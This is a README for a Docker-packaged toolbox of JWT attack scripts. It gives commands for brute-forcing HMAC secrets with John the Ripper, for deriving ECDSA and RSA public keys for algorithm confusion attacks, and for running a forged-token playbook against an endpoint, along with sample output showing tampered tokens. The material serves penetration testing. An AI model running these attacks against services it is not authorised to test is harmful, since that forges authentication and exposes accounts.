The goal of this image is to provide a ready-to-use toolbox with different scripts having for the objective to perform different kinds of attacks against JWT tokens.
💡 Indeed, some existing scripts require specific runtime/package/etc. so the goal is to have a quick ready-to-use sandbox to execute them to obtain crafted JWT token.
Use the following set of command to build the docker image of the toolbox:
git clone https://github.com/righettod/toolbox-jwt.git
cd toolbox-jwt
docker build . -t righettod/toolbox-jwt
💡 The image is build every week and pushed to the GitHub image repository. You can retrieve it with the following command:
docker pull ghcr.io/righettod/toolbox-jwt:main
Use the following command to create a container of the toolbox:
docker run --rm -it ghcr.io/righettod/toolbox-jwt:main /bin/zsh
# From here, use one of the provided script...
To perform an offline brute force operation against a HMAC secret, use one of these JohnTheRipper packages.
💻 Usage:
john tokens.txt --wordlist=rockyou.txt --rules=best64 --format="HMAC-SHA256"
john tokens.txt --show
Note: Author of the script is the PentesterLab team ❤.
Script to generate derivated ECDSA public keys from a JWT ECDSA signed token. To goal is to test exposure to algorithm confusion attacks on token using ECDSA key pair.
💻 Usage:
ruby generate-jwt-ecdsa-derivated-public-keys.rb "JWT_ECDSA_SIGNED_TOKEN"
💻 Example:
# Once in the bash of the toolbox
ruby generate-jwt-ecdsa-derivated-public-keys.rb "eyJ0eXA..."
[+] Key:
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE6mWiWnAqBhDvAWwyiM7+STTq0Csi
spjd61v7AtpvgKMyOHVMxMQ6yyrjVKp/syHteGSeltXdfEQ0Dlv0tkZQqg==
-----END PUBLIC KEY-----
[+] Key:
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE7zuf4prcB/qW4AL7d20LSb99Zwwl
hRSCnHTrpnHUnXoqZVAGwCNpYSJf1rpjZQocwwEL016+OuspiQ67N9EDoA==
-----END PUBLIC KEY-----
Note: Author of the tool used by the script is the Silent Signal team ❤.
Script to generate derivated RSA public keys from a JWT RSA signed token. To goal is to test exposure to algorithm confusion attacks on token using RSA key pair.
💻 Usage:
bash generate-jwt-rsa-derivated-public-keys.sh "JWT_RSA_SIGNED_TOKEN_1" "JWT_RSA_SIGNED_TOKEN_2"
💻 Example:
# Once in the bash of the toolbox
bash generate-jwt-rsa-derivated-public-keys.sh "eyJ0eXA..." "eyJ0eXA..."
[*] GCD: 0x6b
[*] GCD: 0xd7b8aa3...
[+] Found n with multiplier 1 :
0xd7b8aa...
[+] Written to d7b8aa3fc15ccb45_65537_x509.pem
[+] Tampered JWT: b'eyJ0eXAiOiJ...'
[+] Written to d7b8aa3fc15ccb45_65537_pkcs1.pem
[+] Tampered JWT: b'eyJ0eXAiOiH...'
==============================================================
Here are your JWT's once again for your copypasting pleasure
==============================================================
eyJ0eXAiOiJKV1Qi...
eyJ0eXAiOiJKV1Qj...
Script to test an web service against the TICARPI attack playbook ❤.
💻 Usage:
bash apply-jwt-ticarpi-attack-playbook.sh "ENDPOINT_FULL_URL" "CANARY_WORD" "VALID_JWT_TOKEN"
📍 The canary word is a word that must be present in the HTTP response when the JWT token is accepted (case-sensitive).
💬 The JWT token is added into this header Authorization: Bearer $TOKEN
. Edit the script to change its location if needed.
💡 Pipe the command above with | grep --color=always -F "Response Code: 200"
to display only requests for which the JWT token was accepted.
💻 Example:
# Once in the bash of the toolbox
bash apply-jwt-ticarpi-attack-playbook.sh "https://righettod.eu/api/profile" "righettod" "eyJ0eXA..."
...
- https://blog.pentesterlab.com/exploring-algorithm-confusion-attacks-on-jwt-exploiting-ecdsa-23f7ff83390f
- https://github.com/silentsignal/rsa_sign2n
- https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/
- https://github.com/ticarpi/jwt_tool
- https://github.com/ticarpi/jwt_tool/wiki
- https://github.com/Sjord/jwtcrack
- https://www.openwall.com/john/
- https://github.com/openwall/john
- https://gist.github.com/pich4ya/f76280b7a6af67a9adf740f3ee547689
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
- https://www.javainuse.com/jwtgenerator
- https://jwt.io/
- https://github.com/openwall/john-packages
- https://token.dev/